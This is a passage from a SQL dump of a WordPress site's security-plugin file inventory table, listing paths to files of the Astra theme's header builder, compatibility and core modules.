(2477, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/below-header/assets/js/minified/customizer-preview.min.js'),
(2478, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/below-header/assets/js/unminified/customizer-preview.js'),
(2479, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/class-astra-below-header-loader.php', 'wp-content/themes/astra/inc/builder/type/header/below-header/class-astra-below-header-loader.php'),
(2480, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/class-astra-below-header.php', 'wp-content/themes/astra/inc/builder/type/header/below-header/class-astra-below-header.php'),
(2481, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/below-header/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/below-header/dynamic-css/dynamic.css.php'),
(2482, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/button/assets/js/minified/customizer-preview.min.js'),
(2483, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/button/assets/js/unminified/customizer-preview.js'),
(2484, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/class-astra-header-button-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/button/class-astra-header-button-component-loader.php'),
(2485, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/class-astra-header-button-component.php', 'wp-content/themes/astra/inc/builder/type/header/button/class-astra-header-button-component.php'),
(2486, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/button/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/button/dynamic-css/dynamic.css.php'),
(2487, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/assets/js/minified/customizer-preview.min.js'),
(2488, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/assets/js/unminified/customizer-preview.js'),
(2489, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/class-astra-header-edd-cart-component.php', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/class-astra-header-edd-cart-component.php'),
(2490, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/class-astra-header-edd-cart-loader.php', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/class-astra-header-edd-cart-loader.php'),
(2491, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/edd-cart/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/edd-cart/dynamic-css/dynamic.css.php'),
(2492, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/html/assets/js/minified/customizer-preview.min.js'),
(2493, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/html/assets/js/unminified/customizer-preview.js'),
(2494, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/class-astra-header-html-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/html/class-astra-header-html-component-loader.php'),
(2495, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/class-astra-header-html-component.php', 'wp-content/themes/astra/inc/builder/type/header/html/class-astra-header-html-component.php'),
(2496, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/html/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/html/dynamic-css/dynamic.css.php'),
(2497, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/menu/assets/js/minified/customizer-preview.min.js'),
(2498, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/menu/assets/js/unminified/customizer-preview.js'),
(2499, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/class-astra-header-menu-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/menu/class-astra-header-menu-component-loader.php'),
(2500, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/class-astra-header-menu-component.php', 'wp-content/themes/astra/inc/builder/type/header/menu/class-astra-header-menu-component.php'),
(2501, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/menu/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/menu/dynamic-css/dynamic.css.php'),
(2502, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/assets/js/minified/customizer-preview.min.js'),
(2503, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/assets/js/unminified/customizer-preview.js'),
(2504, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/class-astra-mobile-menu-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/class-astra-mobile-menu-component-loader.php'),
(2505, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/class-astra-mobile-menu-component.php', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/class-astra-mobile-menu-component.php'),
(2506, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-menu/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/mobile-menu/dynamic-css/dynamic.css.php'),
(2507, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/assets/js/minified/customizer-preview.min.js'),
(2508, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/assets/js/unminified/customizer-preview.js'),
(2509, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/class-astra-mobile-trigger-loader.php', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/class-astra-mobile-trigger-loader.php'),
(2510, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/class-astra-mobile-trigger.php', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/class-astra-mobile-trigger.php'),
(2511, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/mobile-trigger/dynamic-css/dynamic.css.php'),
(2512, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/assets/js/minified/customizer-preview.min.js'),
(2513, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/assets/js/unminified/customizer-preview.js'),
(2514, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/class-astra-off-canvas-loader.php', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/class-astra-off-canvas-loader.php'),
(2515, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/class-astra-off-canvas.php', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/class-astra-off-canvas.php'),
(2516, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/off-canvas/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/off-canvas/dynamic-css/dynamic.css.php'),
(2517, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/primary-header/assets/js/minified/customizer-preview.min.js'),
(2518, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/primary-header/assets/js/unminified/customizer-preview.js'),
(2519, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/class-astra-primary-header-loader.php', 'wp-content/themes/astra/inc/builder/type/header/primary-header/class-astra-primary-header-loader.php'),
(2520, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/class-astra-primary-header.php', 'wp-content/themes/astra/inc/builder/type/header/primary-header/class-astra-primary-header.php'),
(2521, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/primary-header/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/primary-header/dynamic-css/dynamic.css.php'),
(2522, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/search/assets/js/minified/customizer-preview.min.js'),
(2523, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/search/assets/js/unminified/customizer-preview.js'),
(2524, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/class-astra-header-search-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/search/class-astra-header-search-component-loader.php'),
(2525, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/class-astra-header-search-component.php', 'wp-content/themes/astra/inc/builder/type/header/search/class-astra-header-search-component.php'),
(2526, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/search/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/search/dynamic-css/dynamic.css.php'),
(2527, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/site-identity/assets/js/minified/customizer-preview.min.js'),
(2528, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/site-identity/assets/js/unminified/customizer-preview.js'),
(2529, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/class-astra-header-site-identity-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/site-identity/class-astra-header-site-identity-component-loader.php'),
(2530, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/class-astra-header-site-identity-component.php', 'wp-content/themes/astra/inc/builder/type/header/site-identity/class-astra-header-site-identity-component.php'),
(2531, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/site-identity/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/site-identity/dynamic-css/dynamic.css.php'),
(2532, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/social-icon/assets/js/minified/customizer-preview.min.js'),
(2533, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/social-icon/assets/js/unminified/customizer-preview.js'),
(2534, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/class-astra-header-social-icon-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/social-icon/class-astra-header-social-icon-component-loader.php'),
(2535, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/class-astra-header-social-icon-component.php', 'wp-content/themes/astra/inc/builder/type/header/social-icon/class-astra-header-social-icon-component.php'),
(2536, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/social-icon/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/social-icon/dynamic-css/dynamic.css.php'),
(2537, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/widget/assets/js/minified/customizer-preview.min.js'),
(2538, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/widget/assets/js/unminified/customizer-preview.js'),
(2539, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/class-astra-header-widget-component-loader.php', 'wp-content/themes/astra/inc/builder/type/header/widget/class-astra-header-widget-component-loader.php'),
(2540, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/class-astra-header-widget-component.php', 'wp-content/themes/astra/inc/builder/type/header/widget/class-astra-header-widget-component.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(2541, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/widget/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/widget/dynamic-css/dynamic.css.php'),
(2542, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/assets/js/minified/customizer-preview.min.js'),
(2543, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/assets/js/unminified/customizer-preview.js'),
(2544, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/class-astra-header-woo-cart-component.php', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/class-astra-header-woo-cart-component.php'),
(2545, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/class-astra-header-woo-cart-loader.php', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/class-astra-header-woo-cart-loader.php'),
(2546, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/builder/type/header/woo-cart/dynamic-css/dynamic.css.php', 'wp-content/themes/astra/inc/builder/type/header/woo-cart/dynamic-css/dynamic.css.php'),
(2547, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-after-setup-theme.php', 'wp-content/themes/astra/inc/class-astra-after-setup-theme.php'),
(2548, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-dynamic-css.php', 'wp-content/themes/astra/inc/class-astra-dynamic-css.php'),
(2549, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-extended-base-dynamic-css.php', 'wp-content/themes/astra/inc/class-astra-extended-base-dynamic-css.php'),
(2550, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-global-palette.php', 'wp-content/themes/astra/inc/class-astra-global-palette.php'),
(2551, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-loop.php', 'wp-content/themes/astra/inc/class-astra-loop.php'),
(2552, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/class-astra-mobile-header.php', 'wp-content/themes/astra/inc/class-astra-mobile-header.php'),
(2553, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-amp.php', 'wp-content/themes/astra/inc/compatibility/class-astra-amp.php'),
(2554, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-bb-ultimate-addon.php', 'wp-content/themes/astra/inc/compatibility/class-astra-bb-ultimate-addon.php'),
(2555, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-beaver-builder.php', 'wp-content/themes/astra/inc/compatibility/class-astra-beaver-builder.php'),
(2556, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-beaver-themer.php', 'wp-content/themes/astra/inc/compatibility/class-astra-beaver-themer.php'),
(2557, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-bne-flyout.php', 'wp-content/themes/astra/inc/compatibility/class-astra-bne-flyout.php'),
(2558, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-contact-form-7.php', 'wp-content/themes/astra/inc/compatibility/class-astra-contact-form-7.php'),
(2559, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-divi-builder.php', 'wp-content/themes/astra/inc/compatibility/class-astra-divi-builder.php'),
(2560, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-elementor-pro.php', 'wp-content/themes/astra/inc/compatibility/class-astra-elementor-pro.php'),
(2561, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-elementor.php', 'wp-content/themes/astra/inc/compatibility/class-astra-elementor.php'),
(2562, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-gravity-forms.php', 'wp-content/themes/astra/inc/compatibility/class-astra-gravity-forms.php'),
(2563, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-gutenberg.php', 'wp-content/themes/astra/inc/compatibility/class-astra-gutenberg.php'),
(2564, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-jetpack.php', 'wp-content/themes/astra/inc/compatibility/class-astra-jetpack.php'),
(2565, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-site-origin.php', 'wp-content/themes/astra/inc/compatibility/class-astra-site-origin.php'),
(2566, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-starter-content.php', 'wp-content/themes/astra/inc/compatibility/class-astra-starter-content.php'),
(2567, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-surecart.php', 'wp-content/themes/astra/inc/compatibility/class-astra-surecart.php'),
(2568, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-ubermeu.php', 'wp-content/themes/astra/inc/compatibility/class-astra-ubermeu.php'),
(2569, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-visual-composer.php', 'wp-content/themes/astra/inc/compatibility/class-astra-visual-composer.php'),
(2570, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-web-stories.php', 'wp-content/themes/astra/inc/compatibility/class-astra-web-stories.php'),
(2571, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/class-astra-yoast-seo.php', 'wp-content/themes/astra/inc/compatibility/class-astra-yoast-seo.php'),
(2572, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/class-astra-edd.php', 'wp-content/themes/astra/inc/compatibility/edd/class-astra-edd.php'),
(2573, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/class-astra-customizer-register-edd-section.php', 'wp-content/themes/astra/inc/compatibility/edd/customizer/class-astra-customizer-register-edd-section.php'),
(2574, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class-astra-edd-container-configs.php', 'wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class-astra-edd-container-configs.php'),
(2575, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class-astra-edd-sidebar-configs.php', 'wp-content/themes/astra/inc/compatibility/edd/customizer/sections/class-astra-edd-sidebar-configs.php'),
(2576, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class-astra-edd-archive-layout-configs.php', 'wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class-astra-edd-archive-layout-configs.php'),
(2577, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class-astra-edd-single-product-layout-configs.php', 'wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class-astra-edd-single-product-layout-configs.php'),
(2578, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/edd/edd-common-functions.php', 'wp-content/themes/astra/inc/compatibility/edd/edd-common-functions.php'),
(2579, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/index.php', 'wp-content/themes/astra/inc/compatibility/index.php'),
(2580, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/class-astra-learndash.php', 'wp-content/themes/astra/inc/compatibility/learndash/class-astra-learndash.php'),
(2581, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/customizer/class-astra-customizer-register-learndash-section.php', 'wp-content/themes/astra/inc/compatibility/learndash/customizer/class-astra-customizer-register-learndash-section.php'),
(2582, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/class-astra-learndash-container-configs.php', 'wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/class-astra-learndash-container-configs.php'),
(2583, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/class-astra-learndash-sidebar-configs.php', 'wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/class-astra-learndash-sidebar-configs.php'),
(2584, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/layout/class-astra-learndash-general-configs.php', 'wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/layout/class-astra-learndash-general-configs.php'),
(2585, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/class-astra-lifterlms.php', 'wp-content/themes/astra/inc/compatibility/lifterlms/class-astra-lifterlms.php'),
(2586, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/class-astra-liferlms-section-configs.php', 'wp-content/themes/astra/inc/compatibility/lifterlms/customizer/class-astra-liferlms-section-configs.php'),
(2587, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/class-astra-lifter-container-configs.php', 'wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/class-astra-lifter-container-configs.php'),
(2588, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/class-astra-lifter-sidebar-configs.php', 'wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/class-astra-lifter-sidebar-configs.php'),
(2589, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/layout/class-astra-lifter-general-configs.php', 'wp-content/themes/astra/inc/compatibility/lifterlms/customizer/sections/layout/class-astra-lifter-general-configs.php'),
(2590, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/starter-content/astra-settings-export.json', 'wp-content/themes/astra/inc/compatibility/starter-content/astra-settings-export.json'),
(2591, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/starter-content/home.php', 'wp-content/themes/astra/inc/compatibility/starter-content/home.php'),
(2592, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/class-astra-woocommerce.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/class-astra-woocommerce.php'),
(2593, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/class-astra-customizer-register-woo-section.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/class-astra-customizer-register-woo-section.php'),
(2594, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-shop-container-configs.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-shop-container-configs.php'),
(2595, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-shop-sidebar-configs.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-shop-sidebar-configs.php'),
(2596, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-store-notice-configs.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/class-astra-woo-store-notice-configs.php'),
(2597, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-cart-layout-configs.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-cart-layout-configs.php'),
(2598, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-layout-configs.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-layout-configs.php'),
(2599, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-misc-layout-configs.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-misc-layout-configs.php'),
(2600, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-single-layout-configs.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/customizer/sections/layout/class-astra-woo-shop-single-layout-configs.php'),
(2601, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/compatibility/woocommerce/woocommerce-common-functions.php', 'wp-content/themes/astra/inc/compatibility/woocommerce/woocommerce-common-functions.php'),
(2602, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/builder/class-astra-builder-admin.php', 'wp-content/themes/astra/inc/core/builder/class-astra-builder-admin.php'),
(2603, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/builder/class-astra-builder-helper.php', 'wp-content/themes/astra/inc/core/builder/class-astra-builder-helper.php'),
(2604, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/builder/class-astra-builder-options.php', 'wp-content/themes/astra/inc/core/builder/class-astra-builder-options.php'),
(2605, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-admin-helper.php', 'wp-content/themes/astra/inc/core/class-astra-admin-helper.php'),
(2606, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-admin-settings.php', 'wp-content/themes/astra/inc/core/class-astra-admin-settings.php'),
(2607, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-attr.php', 'wp-content/themes/astra/inc/core/class-astra-attr.php'),
(2608, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-enqueue-scripts.php', 'wp-content/themes/astra/inc/core/class-astra-enqueue-scripts.php'),
(2609, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-icons.php', 'wp-content/themes/astra/inc/core/class-astra-icons.php'),
(2610, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-theme-options.php', 'wp-content/themes/astra/inc/core/class-astra-theme-options.php'),
(2611, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-walker-page.php', 'wp-content/themes/astra/inc/core/class-astra-walker-page.php'),
(2612, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-astra-wp-editor-css.php', 'wp-content/themes/astra/inc/core/class-astra-wp-editor-css.php'),
(2613, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-gutenberg-editor-css.php', 'wp-content/themes/astra/inc/core/class-gutenberg-editor-css.php'),
(2614, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/class-theme-strings.php', 'wp-content/themes/astra/inc/core/class-theme-strings.php'),
(2615, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/common-functions.php', 'wp-content/themes/astra/inc/core/common-functions.php'),
(2616, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/core/deprecated/deprecated-filters.php', 'wp-content/themes/astra/inc/core/deprecated/deprecated-filters.php'),
